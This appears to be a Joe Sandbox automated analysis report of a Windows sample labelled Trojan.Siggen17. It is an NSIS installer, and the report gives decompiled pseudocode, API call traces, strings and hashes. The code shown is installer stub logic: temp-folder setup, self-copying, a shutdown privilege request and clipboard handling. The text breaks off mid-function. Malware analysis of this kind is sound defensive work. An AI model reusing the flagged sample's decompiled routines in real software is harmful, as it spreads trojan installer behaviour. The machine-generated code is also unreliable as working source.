													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe\" ") {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\Arthur\\Desktop";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t220);
														}
														E0040653D(0x436000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x436800 = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe", 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x0040353b
0x0040353c
0x00403543
0x00403546
0x0040354d
0x00403550
0x00403563
0x00403569
0x0040356c
0x0040356f
0x0040357d
0x00403585
0x00403590
0x004035a9
0x004035ab
0x004035b3
0x004035b3
0x004035be
0x004035c0
0x004035c0
0x004035d5
0x004035fa
0x00403608
0x0040360b
0x00403612
0x00403619
0x00403619
0x00403612
0x0040361b
0x00403620
0x00403621
0x0040362d
0x00403631
0x00403638
0x00403646
0x0040364b
0x00403652
0x00403656
0x0040365a
0x0040365c
0x0040365c
0x0040365a
0x00403663
0x0040366a
0x00403670
0x00403688
0x00403698
0x0040369d
0x004036a3
0x004036aa
0x004036b1
0x004036b3
0x004036b4
0x004036be
0x004036c5
0x004036c7
0x004036c9
0x004036c9
0x004036dc
0x004036de
0x004037d8
0x004037d8
0x004037db
0x004037de
0x00000000
0x00000000
0x004036e8
0x004036e9
0x004036ec
0x004036f5
0x004036f5
0x004036f8
0x004036fb
0x004036fe
0x00403701
0x00403701
0x00403701
0x00403702
0x00403706
0x004037c6
0x004037cf
0x004037d1
0x004037d4
0x004037d7
0x004037d7
0x004037d7
0x00000000
0x0040370c
0x0040370d
0x0040370e
0x00403712
0x0040372c
0x00403733
0x00403746
0x00403747
0x0040375c
0x00403761
0x00403763
0x00403765
0x00403781
0x00403788
0x0040379b
0x0040379c
0x004037b1
0x004037b7
0x004037b9
0x004037bb
0x004037c3
0x004037c5
0x00000000
0x004037c5
0x004037bf
0x004037c1
0x004037e6
0x004037ea
0x004037f3
0x004037f8
0x004037fe
0x00403809
0x0040380b
0x00403810
0x00403812
0x0040386a
0x0040386f
0x00403878
0x0040387f
0x00403882
0x00403a59
0x00403a59
0x00403a5e
0x00403a67
0x00403a84
0x00403afc
0x00403afc
0x00403b04
0x00403b06
0x00403b06
0x00403b0c
0x00403b0c
0x00403a9b
0x00403aa7
0x00403ab8
0x00403abf
0x00403ac6
0x00403ac6
0x00403ace
0x00403ada
0x00403ae8
0x00403af3
0x00000000
0x00000000
0x00000000
0x00403adc
0x00403adc
0x00403add
0x00403adf
0x00403ae0
0x00403ae1
0x00403ae6
0x00403af5
0x00403af7
0x00000000
0x00403af7
0x00000000
0x00403ae6
0x00403ada
0x00403a71
0x00403a78
0x00403a78
0x0040388e
0x00403935
0x00403935
0x00403941
0x00000000
0x00403941
0x0040389f
0x004038a7
0x004038f9
0x004038f9
0x004038ff
0x00403906
0x00403954
0x00403956
0x0040395b
0x0040395d
0x00403965
0x00403965
0x00403970
0x00403975
0x0040397c
0x00403982
0x00403984
0x00403a57
0x00403a57
0x00403a57
0x00000000
0x0040398a
0x0040398a
0x0040398c
0x0040398d
0x00403996
0x0040398f
0x0040398f
0x0040398f
0x0040399c
0x004039a4
0x004039ab
0x004039b3
0x004039b3
0x004039c0
0x004039cc
0x004039d6
0x004039d6
0x004039d8
0x004039df
0x004039e9
0x004039f5
0x004039fb
0x00403a01
0x00403a04
0x00403a0e
0x00403a14
0x00403a16
0x00403a1a
0x00403a2b
0x00403a31
0x00403a36
0x00403a38
0x00403a3b
0x00403a41
0x00403a41
0x00403a38
0x00403a16
0x00403a44
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a52
0x00000000
0x00403a52
0x00403984
0x00403908
0x0040390b
0x0040390f
0x00403914
0x00403916
0x00000000
0x00000000
0x00403922
0x0040392d
0x00403932
0x00000000
0x00403932
0x004038b0
0x004038c8
0x004038d9
0x004038da
0x004038de
0x004038e0
0x004038ee
0x004038f5
0x00000000
0x00000000
0x00000000
0x004038f5
0x004038f7
0x00000000
0x004038f7
0x0040381a
0x00403826
0x0040382b
0x00403830
0x00403832
0x00000000
0x00000000
0x0040383a
0x00403842
0x00403853
0x0040385b
0x0040385d
0x00403862
0x00403864
0x00000000
0x00000000
0x00000000
0x00403864
0x00000000
0x004037c1
0x0040376a
0x0040376c
0x00000000
0x00000000
0x0040376e
0x00403772
0x00403776
0x0040377d
0x0040377d
0x0040377d
0x0040377d
0x00000000
0x0040377d
0x00403778
0x0040377b
0x00000000
0x00000000
0x00000000
0x0040377b
0x00403714
0x00403718
0x0040371b
0x00403722
0x00403722
0x00000000
0x00403722
0x0040371d
0x00403720
0x00000000
0x00000000
0x00000000
0x00403720
0x00000000
0x00000000
0x00000000
0x004036ee
0x004036ee
0x004036ef
0x004036f0
0x004036f0
0x00000000
0x004036ee
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe" ,00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
DeleteFileW.KERNELBASE(1033), ref: 0040386F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe" ,00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

TMP, xrefs: 00403856
~nsu, xrefs: 0040394E
C:\Users\user\AppData\Local\Temp, xrefs: 00403928
Error launching installer, xrefs: 004038FF
SeShutdownPrivilege, xrefs: 00403AA1
C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, xrefs: 00403A09
C:\Users\user\Desktop, xrefs: 00403975, 0040397A, 004039AD
"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe" , xrefs: 004036A3, 004036A9, 004036BE, 00403895, 004038A1, 004038EF, 004038F9
UXTHEME, xrefs: 0040361B, 00403620, 00403626
Low, xrefs: 0040383C
.tmp, xrefs: 0040396A
C:\Users\user\AppData\Local\Temp, xrefs: 004037EE, 0040391D, 004039A4, 004039AE
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FE, 00403803, 00403819, 00403825, 00403834, 00403841, 0040384D, 00403855, 00403953, 00403964, 0040396F, 0040397B, 0040398C, 0040399B, 00403A51
\Temp, xrefs: 00403820
1033, xrefs: 0040386A
NSIS Error, xrefs: 0040368E
TEMP, xrefs: 0040384E

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-3929776513
Opcode ID: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4; // 0x103e2
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x433ecc - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x434f08, 8);
							__eflags =  *0x434f8c - _t156;
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x541604
								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056e6
0x004056ec
0x004056f6
0x004056f9
0x00405888
0x0040588f
0x004058ac
0x004058b3
0x004058b3
0x004058b9
0x004058c6
0x004058e4
0x004058e6
0x004058e7
0x004058ee
0x00405944
0x00405944
0x00405948
0x00000000
0x00000000
0x0040594a
0x0040594d
0x00405950
0x00000000
0x00000000
0x0040595a
0x00405960
0x00405962
0x00405965
0x00405a67
0x00000000
0x00405a67
0x00405974
0x0040597f
0x00405988
0x0040598f
0x00405993
0x00405996
0x0040599f
0x004059a5
0x004059a8
0x004059a8
0x004059b8
0x004059be
0x004059c0
0x004059c9
0x004059cc
0x004059d3
0x004059da
0x004059e2
0x004059e2
0x004059f0
0x004059f6
0x004059f9
0x004059f9
0x00405a00
0x00405a06
0x00405a12
0x00405a19
0x00405a22
0x00405a24
0x00405a27
0x00405a36
0x00405a39
0x00405a3f
0x00405a40
0x00405a46
0x00405a47
0x00405a48
0x00405a48
0x00405a50
0x00405a5b
0x00405a61
0x00405a61
0x00000000
0x004059c0
0x004058f0
0x004058f6
0x00405926
0x00405928
0x0040592e
0x00405930
0x00405939
0x00405939
0x0040593f
0x00000000
0x0040593f
0x004058fa
0x00405904
0x00000000
0x004058c8
0x004058c8
0x004058ce
0x00405909
0x00000000
0x00405912
0x004058d7
0x004058dc
0x004058df
0x00000000
0x004058df
0x004058c6
0x004056ff
0x00405703
0x0040570b
0x0040570f
0x00405712
0x00405715
0x00405718
0x0040571b
0x0040571c
0x0040571d
0x00405736
0x00405739
0x00405743
0x00405752
0x0040575a
0x00405762
0x00405767
0x0040576a
0x00405776
0x0040577f
0x00405788
0x004057aa
0x004057b0
0x004057c1
0x004057c6
0x004057d4
0x004057e2
0x004057e2
0x004057e7
0x004057f5
0x004057f5
0x004057fa
0x004057fd
0x00405802
0x0040580e
0x00405817
0x00405824
0x00405833
0x00405826
0x0040582b
0x0040582b
0x0040583f
0x0040583f
0x00405853
0x0040585c
0x00405865
0x00405875
0x00405881
0x00405881
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32(?,?), ref: 00405788
GetSystemMetrics.USER32(00000002), ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
CloseHandle.KERNELBASE(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(000103E2,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
GetWindowRect.USER32(?,?), ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32(00000000), ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
